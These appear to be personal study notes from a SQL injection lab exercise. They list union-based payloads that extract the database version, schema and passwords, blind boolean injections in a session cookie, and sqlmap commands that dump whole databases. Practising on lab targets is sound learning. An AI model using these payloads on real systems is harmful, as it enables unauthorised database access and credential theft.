SQLi

# VIEW THIS
https://portswigger.net/web-security/sql-injection/cheat-sheet

# Second order
# Just see the injection0x04
jeremy' or 1=1-- -

# the pound sign # is just a terminator like -- -
jeremy' union select null,null,version()#

jeremy' union select null,null,version()-- -

jeremy' union select null,null,table_name from information_schema.tables#

jeremy' union select null,null,column_name from information_schema.columns#

jeremy' union select null,null,password from injection0x01#

# First you need a valid session 
# Try to put some injection in the session header
# See the injection 02 section
# Blind injection since it is not returning anything just behaviour
Cookie: session=6967cabefd763ac1a1a88e11159957db' or 1=1#



# https://www.w3schools.com/sql/func_mysql_substring.asp
# First we will try to determine the sql version
# The second spot is first line character 1 it will select MY since it is 1("MY SQL HAHA")
# The third spot is the length like (abced)
Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select version()),1,1) = '8'#

Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select version()),1,3) = '8.0'#

Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select version()),1,5) = '8.0.3'#

# First save the request with the session cookie
# See the injection 0x02
# --level=2 is for the cookie testing
sqlmap -r session.txt --level=2 

# It will dump all database 
sqlmap -r session.txt --level=2 --dump

# This will dump table injection0x02
sqlmap -r session.txt --level=2 --dump -T injection0x02